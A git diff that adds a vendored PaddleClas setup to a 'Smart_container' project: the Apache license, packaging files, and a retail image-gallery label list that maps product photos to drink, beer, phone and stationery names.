diff --git a/Smart_container/PaddleClas/.gitignore b/Smart_container/PaddleClas/.gitignore new file mode 100644 index 0000000..f56c23c --- /dev/null +++ b/Smart_container/PaddleClas/.gitignore @@ -0,0 +1,13 @@ +__pycache__/ +*.pyc +*.sw* +*/workerlog* +checkpoints/ +output*/ +pretrained/ +.ipynb_checkpoints/ +*.ipynb* +_build/ +build/ +log/ +nohup.out diff --git a/Smart_container/PaddleClas/LICENSE b/Smart_container/PaddleClas/LICENSE new file mode 100644 index 0000000..261eeb9 --- /dev/null +++ b/Smart_container/PaddleClas/LICENSE @@ -0,0 +1,201 @@ + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. diff --git a/Smart_container/PaddleClas/MANIFEST.in b/Smart_container/PaddleClas/MANIFEST.in new file mode 100644 index 0000000..b0a4f6d --- /dev/null +++ b/Smart_container/PaddleClas/MANIFEST.in @@ -0,0 +1,7 @@ +include LICENSE.txt +include README.md +include docs/en/whl_en.md +recursive-include deploy/python predict_cls.py preprocess.py postprocess.py det_preprocess.py +recursive-include deploy/utils get_image_list.py config.py logger.py predictor.py + +recursive-include ppcls/ *.py *.txt \ No newline at end of file diff --git a/Smart_container/PaddleClas/__init__.py b/Smart_container/PaddleClas/__init__.py new file mode 100644 index 0000000..b8b4361 --- /dev/null +++ b/Smart_container/PaddleClas/__init__.py @@ -0,0 +1,16 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +__all__ = ['PaddleClas'] +from .paddleclas import PaddleClas diff --git a/Smart_container/PaddleClas/dataset/retail/data_update.txt b/Smart_container/PaddleClas/dataset/retail/data_update.txt new file mode 100644 index 0000000..b0678d2 --- /dev/null +++ b/Smart_container/PaddleClas/dataset/retail/data_update.txt @@ -0,0 +1,189 @@ +gallery/HUAWEI_WATCH_3_Pro.jpg HUAWEI_WATCH_3_Pro +gallery/iphone_13.jpg iphone_13 +gallery/iQOO_7.jpg iQOO_7 +gallery/Mecoguozhichataotaohongyou.jpg Meco果汁茶桃桃红柚 +gallery/Mecoguozhichataishiqingning.jpg Meco果汁茶泰式青柠 +gallery/Redmi_K40.jpg Redmi_K40 +gallery/VIVO_x27.jpg VIVO_x27 +gallery/VOSSkuangquanshui.jpg VOSS矿泉水 +gallery/Xiaomi_Civi.jpg Xiaomi_Civi +gallery/qixi330ml.jpg 七喜330ml +gallery/sandeliwulongcha.jpg 三得利乌龙茶 +gallery/dongfangshuyewulongcha.jpg 东方树叶乌龙茶 +gallery/dongfangshuyehongcha.jpg 东方树叶红茶 +gallery/dongfangshuyemolihuacha.jpg 东方树叶茉莉花茶 +gallery/dongpengteyinpingzhuang.jpg 东鹏特饮瓶装 +gallery/dongpengteyinzuhezhuang.jpg 东鹏特饮组合装 +gallery/rusuanjun600yi_2.jpg 乳酸菌600亿_2 +gallery/rusuanjun600yi_3.jpg 乳酸菌600亿_3 +gallery/rusuanjun600yiyuanwei.jpg 乳酸菌600亿原味 +gallery/rusuanjun600yimangguo.jpg 乳酸菌600亿芒果 +gallery/rusuanjun600yiluhui.jpg 乳酸菌600亿芦荟 +gallery/rusuanjun600yicaomei.jpg 乳酸菌600亿草莓 +gallery/rusuanjun600yixigua.jpg 乳酸菌600亿西瓜 +gallery/yilianmuxipingzhuangyuanwei230g.jpg 伊利安慕希瓶装原味230g +gallery/yilianmuxicaomeiweisuannai205g.jpg 伊利安慕希草莓味酸奶205g +gallery/yilianmuxicaomeiyanmaiweisuannai200g.jpg 伊利安慕希草莓燕麦味酸奶200g +gallery/yilianmuxigaoduanyuanwei230ml.jpg 伊利安慕希高端原味230ml +gallery/yilianmuxigaoduanchengfengliwei230ml.jpg 伊利安慕希高端橙凤梨味230ml +gallery/yilichunniunai250ml.jpg 伊利纯牛奶250ml +gallery/youbei.jpg 优倍 +gallery/youlaorujiankangdamai180g_4maixiangyuanwei.jpg 优酪乳健康大麦180g_4麦香原味 +gallery/youlaorujiankangdamai180gcaomeiwei.jpg 优酪乳健康大麦180g草莓味 +gallery/youlaorujiankangdamai180gmaixiangyuanwei.jpg 优酪乳健康大麦180g麦香原味 +gallery/youlaoruweiguoli230gmangguohuangtao.jpg 优酪乳唯果粒230g芒果黄桃 +gallery/youlaoruweiguoli230gluhui.jpg 优酪乳唯果粒230g芦荟 +gallery/youlaoruweiguoli230gcaomei.jpg 优酪乳唯果粒230g草莓 +gallery/youlaorusijixianxuan180g_4luhui.jpg 优酪乳四季鲜选180g_4芦荟 +gallery/youlaorusijixianxuan180g_4huangtao.jpg 优酪乳四季鲜选180g_4黄桃 +gallery/youlaorusijixianxuan180gluhui.jpg 优酪乳四季鲜选180g芦荟 +gallery/youlaorusijixianxuan180ghuangtao.jpg 优酪乳四季鲜选180g黄桃 +gallery/youlaorumanyidian100g_8yuanwei.jpg 优酪乳慢一点100g_8原味 +gallery/youlaorulvxingyouge220gdanmaizhishiwei.jpg 优酪乳旅行优格220g丹麦芝士味 +gallery/youlaorulvxingyouge220gbaojialiyameiguiwei.jpg 优酪乳旅行优格220g保加利亚玫瑰味 +gallery/youlaorujiandandian100g_8yuanwei.jpg 优酪乳简单点100g_8原味 +gallery/youlaorujiandandian230gbantang.jpg 优酪乳简单点230g半糖 +gallery/youlaorujiandandianyuanwei.jpg 优酪乳简单点原味 +gallery/youlaorujiandandiankaosuannai.jpg 优酪乳简单点烤酸奶 +gallery/youlaorushunchangdian230gyuanwei.jpg 优酪乳顺畅点230g原味 +gallery/banlvjiangyou1L.jpg 伴侣酱油1L +gallery/banlvjiangyou2L.jpg 伴侣酱油2L +gallery/yuanqisenlinruchakafeinatie.jpg 元气森林乳茶咖啡拿铁 +gallery/yuanqisenlinruchanongxiangyuanwei.jpg 元气森林乳茶浓香原味 +gallery/yuanqisenlinruchamoxiangnailv.jpg 元气森林乳茶茉香奶绿 +gallery/yuanqisenlinrusuanjunsudaqipaoshui.jpg 元气森林乳酸菌苏打气泡水 +gallery/yuanqisenlinwutangqiamanjuweisudaqipaoshui.jpg 元气森林无糖卡曼橘味苏打气泡水 +gallery/yuanqisenlinwutangbaitaoweisudaqipaoshui.jpg 元气森林无糖白桃味苏打气泡水 +gallery/yuanqisenlinyinghuaputaosudaqipaoshui.jpg 元气森林樱花葡萄苏打气泡水 +gallery/yuanqisenlinranchawutangtaoxiangwulongcha.jpg 元气森林燃茶无糖桃香乌龙茶 +gallery/yuanqisenlinranchawutangchunxiangwulongcha.jpg 元气森林燃茶无糖醇香乌龙茶 +gallery/yuanqisenlinranchaxuanmiwulongcha.jpg 元气森林燃茶玄米乌龙茶 +gallery/yuanqisenlinbaitaoweisudaqipaoshui.jpg 元气森林白桃味苏打气泡水 +gallery/yuanqisenlinsuanmeizhisudaqipaoshui.jpg 元气森林酸梅汁苏打气泡水 +gallery/yuanqisenlinqingguaweisudaqipaoshui.jpg 元气森林青瓜味苏打气泡水 +gallery/guangminglimai.jpg 光明藜麦 +gallery/guangmingxianniunai.jpg 光明鲜牛奶 +gallery/yangleduo.jpg 养乐多 +gallery/yangleduozuhezhuang.jpg 养乐多组合装 +gallery/nongfushanquan17.5.jpg 农夫山泉17.5 +gallery/nongfushanquanNFC.jpg 农夫山泉NFC +gallery/nongfushanquanweitamingshuirusuanjunfengwei.jpg 农夫山泉维他命水乳酸菌风味 +gallery/nongfushanquanweitamingshuiganjufengwei.jpg 农夫山泉维他命水柑橘风味 +gallery/nongfushanquanweitamingshuiningmengfengwei.jpg 农夫山泉维他命水柠檬风味 +gallery/nongfushanquanweitamingshuiredaishuiguofengwei.jpg 农夫山泉维他命水热带水果风味 +gallery/nongfushanquanweitamingshuishiliulanmeifengwei.jpg 农夫山泉维他命水石榴蓝莓风味 +gallery/nongfushanquanweitamingshuilanmeishumeiwei.jpg 农夫山泉维他命水蓝莓树莓味 +gallery/guanyiru.jpg 冠益乳 +gallery/binglukuangquanshuizuhezhuang.jpg 冰露矿泉水组合装 +gallery/bingluchunyuekuangquanshui.jpg 冰露纯悦矿泉水 +gallery/kaixuan1664blancpijiupingzhuang.jpg 凯旋1664blanc啤酒瓶装 +gallery/kaixuan1664blancpijiuguanpi.jpg 凯旋1664blanc啤酒罐啤 +gallery/wuhouhongchaningmengwei.jpg 午后红茶柠檬味 +gallery/huaweiMate_40.jpg 华为Mate_40 +gallery/huaweiP50_Pro.jpg 华为P50_Pro +gallery/xiaomi11.jpg 小米11 +gallery/jianjiaoduotaixing.jpg 尖叫多肽型 +gallery/kangshifubingtangwulongcha.jpg 康师傅冰糖乌龙茶 +gallery/kangshifubingtangningmeng.jpg 康师傅冰糖柠檬 +gallery/kangshifubingtangxueli.jpg 康师傅冰糖雪梨 +gallery/kangshifubinghongcha.jpg 康师傅冰红茶 +gallery/kangshifubinglvcha.jpg 康师傅冰绿茶 +gallery/kangshifulvcha.jpg 康师傅绿茶 +gallery/kangshifumoliyoucha.jpg 康师傅茉莉柚茶 +gallery/kangshifumoliqingcha.jpg 康师傅茉莉清茶 +gallery/kangshifufengmiyouzi.jpg 康师傅蜂蜜柚子 +gallery/deliqiatongchangweipiaojia.jpg 得力卡通长尾票夹 +gallery/deliwenjianjia.jpg 得力文件夹 +gallery/wangziniunai.jpg 旺仔牛奶 +gallery/mingzhichunyi_youyang.jpg 明治醇壹_优漾 +gallery/xingbake250mlkafeinatie.jpg 星巴克250ml咖啡拿铁 +gallery/xingbake250mlmochanatie.jpg 星巴克250ml抹茶拿铁 +gallery/xingbake250mlxiangcaonatie.jpg 星巴克250ml香草拿铁 +gallery/yeshupaiyezhi.jpg 椰树牌椰汁 +gallery/xinheshousicu245ML.jpg 欣和寿司醋245ML +gallery/meiriCguoshuzhi300mlshumeihongtiancai.jpg 每日C果蔬汁300ml树莓红甜菜 +gallery/meiriCguoshuzhi300mlbaixiangguonangua.jpg 每日C果蔬汁300ml百香果南瓜 +gallery/meiriCguoshuzhi300mljinjieyuyiganlan.jpg 每日C果蔬汁300ml金桔羽衣甘蓝 +gallery/meiriCchengzhi300ml.jpg 每日C橙汁300ml +gallery/meiriCchunguozhiguoxiancheng.jpg 每日C纯果汁果纤橙 +gallery/meiriCchunguozhitaozhi.jpg 每日C纯果汁桃汁 +gallery/meiriCchunguozhichengzhi.jpg 每日C纯果汁橙汁 +gallery/meiriCchunguozhihuluobuzhi.jpg 每日C纯果汁胡萝卜汁 +gallery/meiriCchunguozhimangguo.jpg 每日C纯果汁芒果 +gallery/meiriCchunguozhipingguo.jpg 每日C纯果汁苹果 +gallery/meiriCchunguozhiputao.jpg 每日C纯果汁葡萄 +gallery/meiriCchunguozhiputaoyou.jpg 每日C纯果汁葡萄柚 +gallery/meiyitian.jpg 每益添 +gallery/shuidongletaowei600ml.jpg 水动乐桃味600ml +gallery/faguoyuanzhuangjinkoubalishuiperrieryuanwei.jpg 法国原装进口巴黎水perrier原味 +gallery/faguoyuanzhuangjinkoubalishuiperrierqingning.jpg 法国原装进口巴黎水perrier青柠 +gallery/baishikelewutangguanzhuang.jpg 百事可乐无糖罐装 +gallery/baishikeleguanzhuangsufeng.jpg 百事可乐罐装塑封 +gallery/baiweipijiuhongselvguan.jpg 百威啤酒红色铝罐 +gallery/baiweipijiujinzun550guanpi.jpg 百威啤酒金尊550罐啤 +gallery/baisuishan500ml.jpg 百岁山500ml +gallery/qianzibi.jpg 签字笔 +gallery/tongyilvcha.jpg 统一绿茶 +gallery/meiniandaningmengwei.jpg 美年达柠檬味 +gallery/meiniandachengweiqishui500ml.jpg 美年达橙味汽水500ml +gallery/meiniandachengweiguanzhuang.jpg 美年达橙味罐装 +gallery/meiniandaqingpingguoweiqishui500ml.jpg 美年达青苹果味汽水500ml +gallery/fendayeziweipingzhuang.jpg 芬达椰子味瓶装 +gallery/fendapingguoweipingzhuang.jpg 芬达苹果味瓶装 +gallery/fendapingguoweiguanzhuang.jpg 芬达苹果味罐装 +gallery/fendaboluoweipingzhuang.jpg 芬达菠萝味瓶装 +gallery/fendaputaoweipingzhuang.jpg 芬达葡萄味瓶装 +gallery/fendaputaoweiguanzhuang.jpg 芬达葡萄味罐装 +gallery/fendamitaoweipingzhuang.jpg 芬达蜜桃味瓶装 +gallery/fendamitaoweiguanzhuang.jpg 芬达蜜桃味罐装 +gallery/fendaxiguaweipingzhuang.jpg 芬达西瓜味瓶装 +gallery/fendaxiguaweiguanzhuang.jpg 芬达西瓜味罐装 +gallery/fendalingqiachengweipingzhuang.jpg 芬达零卡橙味瓶装 +gallery/mengniuyouyic.jpg 蒙牛优益c +gallery/mengniuchunzhenpingzhuanghongxiyouweisuannai230g.jpg 蒙牛纯甄瓶装红西柚味酸奶230g +gallery/guwuniuruyinpin300gyanmaiguli.jpg 谷物牛乳饮品300g燕麦谷粒 +gallery/guwuniuruyinpin300ghongdouzimi.jpg 谷物牛乳饮品300g红豆紫米 +gallery/guwuniuruyinpin300glimaiyumi.jpg 谷物牛乳饮品300g藜麦玉米 +gallery/guwuniuruyinpin950gyanmaiguli.jpg 谷物牛乳饮品950g燕麦谷粒 +gallery/guwuniuruyinpin950ghongdouzimi.jpg 谷物牛乳饮品950g红豆紫米 +gallery/haogedengpijiu.jpg 豪格登啤酒 +gallery/beiruisitabarista.jpg 贝瑞斯塔barista +gallery/beinasongmingdizhenxuan250mlxidamo.jpg 贝纳颂名地臻选250ml西达摩 +gallery/beinasongkafeinatie.jpg 贝纳颂咖啡拿铁 +gallery/beinasongjingdianxilie250mlnatie.jpg 贝纳颂经典系列250ml拿铁 +gallery/beinasongjingdianxilie250mlmoqia.jpg 贝纳颂经典系列250ml摩卡 +gallery/beinasongjingdianxilie250mllanshan.jpg 贝纳颂经典系列250ml蓝山 +gallery/asamunaicha.jpg 阿萨姆奶茶 +gallery/quechaomeijixian.jpg 雀巢美极鲜 +gallery/xuebiguanzhuang.jpg 雪碧罐装 +gallery/xuehua8duyongchuangtianya500mlpingzhuang.jpg 雪花8度勇闯天涯500ml瓶装 +gallery/xuehua8duyongchuangtianya500mlguanpi.jpg 雪花8度勇闯天涯500ml罐啤 +gallery/xuehua8duyongchuangtianyaguanpi_6zuhezhuang.jpg 雪花8度勇闯天涯罐啤_6组合装 +gallery/xuehua8duqingshuang.jpg 雪花8度清爽 +gallery/xuehua9duyongchuangtianya500mlpingzhuang.jpg 雪花9度勇闯天涯500ml瓶装 +gallery/xuehuabingku330mlxiangzhuang.jpg 雪花冰酷330ml箱装 +gallery/xuehuabingku9duguanpi.jpg 雪花冰酷9度罐啤 +gallery/xuehuayongchuangtianyasuperX.jpg 雪花勇闯天涯superX +gallery/xuehuaqingshuang8du330_6guanpizuhezhuang.jpg 雪花清爽8度330_6罐啤组合装 +gallery/xuehuaqingshuang8duxiangzhuang.jpg 雪花清爽8度箱装 +gallery/xuehuajingzhi9du500_6guanpizuhezhuang.jpg 雪花精制9度500_6罐啤组合装 +gallery/xuehuachunsheng500mlpingzhuang.jpg 雪花纯生500ml瓶装 +gallery/xuehuachunsheng500mlzuhezhuang.jpg 雪花纯生500ml组合装 +gallery/xuehuachunshengguanpi.jpg 雪花纯生罐啤 +gallery/xuehualianpuhuadanxilie8du500guanpi.jpg 雪花脸谱花旦系列8度500罐啤 +gallery/qingdaopijiuquanmaibaipi500guanpi.jpg 青岛啤酒全麦白啤500罐啤 +gallery/qingdaopijiuaogute500ml.jpg 青岛啤酒奥古特500ml +gallery/qingdaopijiuxiaozongjin296pingzhuang.jpg 青岛啤酒小棕金296瓶装 +gallery/qingdaopijiudanshuang8du330guanpi.jpg 青岛啤酒淡爽8度330罐啤 +gallery/qingdaopijiuqingchun330ml.jpg 青岛啤酒清醇330ml +gallery/qingdaopijiuchunsheng500mlguanpi.jpg 青岛啤酒纯生500ml罐啤 +gallery/qingdaopijiuchunsheng600mlpingzhuang.jpg 青岛啤酒纯生600ml瓶装 +gallery/qingdaopijiujingdian10du500guanpi.jpg 青岛啤酒经典10度500罐啤 +gallery/qingdaopijiujingdian11du330guanpi.jpg 青岛啤酒经典11度330罐啤 +gallery/qingdaopijiujingdian11duguanpiniuqiazhizuhezhuang.jpg 青岛啤酒经典11度罐啤牛卡纸组合装 +gallery/qingdaopijiuhongyundangtou355pingzhuang.jpg 青岛啤酒鸿运当头355瓶装 +gallery/qingdaopijiuheipijiu500guanpi.jpg 青岛啤酒黑啤酒500罐啤 +gallery/meizu18.jpg 魅族18 +gallery/xiuzhengdai.jpg 修正带 +gallery/jiangxiaobai.jpg 江小白 +gallery/xiaoyuanbinggan.jpg 小圆饼干 diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/HUAWEI_P30_PRO.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/HUAWEI_P30_PRO.jpg new file mode 100644 index 0000000..141145e Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/HUAWEI_P30_PRO.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/HUAWEI_WATCH_3_Pro.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/HUAWEI_WATCH_3_Pro.jpg new file mode 100644 index 0000000..84ed575 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/HUAWEI_WATCH_3_Pro.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/Mecoguozhichataishiqingning.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/Mecoguozhichataishiqingning.jpg new file mode 100644 index 0000000..7ff542d Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/Mecoguozhichataishiqingning.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/Mecoguozhichataotaohongyou.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/Mecoguozhichataotaohongyou.jpg new file mode 100644 index 0000000..6b5699c Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/Mecoguozhichataotaohongyou.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/Redmi_K40.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/Redmi_K40.jpg new file mode 100644 index 0000000..e735961 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/Redmi_K40.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/VIVO_x27.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/VIVO_x27.jpg new file mode 100644 index 0000000..15b436c Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/VIVO_x27.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/VOSSkuangquanshui.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/VOSSkuangquanshui.jpg new file mode 100644 index 0000000..2f50c70 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/VOSSkuangquanshui.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/Xiaomi_Civi.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/Xiaomi_Civi.jpg new file mode 100644 index 0000000..2eaaf9b Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/Xiaomi_Civi.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/airpods2.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/airpods2.jpg new file mode 100644 index 0000000..ff91780 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/airpods2.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/asamunaicha.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/asamunaicha.jpg new file mode 100644 index 0000000..68e341c Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/asamunaicha.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/baishikeleguanzhuangsufeng.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/baishikeleguanzhuangsufeng.jpg new file mode 100644 index 0000000..8bcddf0 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/baishikeleguanzhuangsufeng.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/baishikelewutangguanzhuang.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/baishikelewutangguanzhuang.jpg new file mode 100644 index 0000000..51b74f6 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/baishikelewutangguanzhuang.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/baisuishan500ml.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/baisuishan500ml.jpg new file mode 100644 index 0000000..6eefaaa Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/baisuishan500ml.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/baiweipijiuhongselvguan.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/baiweipijiuhongselvguan.jpg new file mode 100644 index 0000000..e581e3f Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/baiweipijiuhongselvguan.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/baiweipijiujinzun550guanpi.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/baiweipijiujinzun550guanpi.jpg new file mode 100644 index 0000000..0cceb94 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/baiweipijiujinzun550guanpi.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/banlvjiangyou1L.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/banlvjiangyou1L.jpg new file mode 100644 index 0000000..ba27281 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/banlvjiangyou1L.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/banlvjiangyou2L.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/banlvjiangyou2L.jpg new file mode 100644 index 0000000..e9a49a7 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/banlvjiangyou2L.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/beinasongjingdianxilie250mllanshan.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/beinasongjingdianxilie250mllanshan.jpg new file mode 100644 index 0000000..8ea8185 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/beinasongjingdianxilie250mllanshan.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/beinasongjingdianxilie250mlmoqia.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/beinasongjingdianxilie250mlmoqia.jpg new file mode 100644 index 0000000..20c6f3f Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/beinasongjingdianxilie250mlmoqia.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/beinasongjingdianxilie250mlnatie.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/beinasongjingdianxilie250mlnatie.jpg new file mode 100644 index 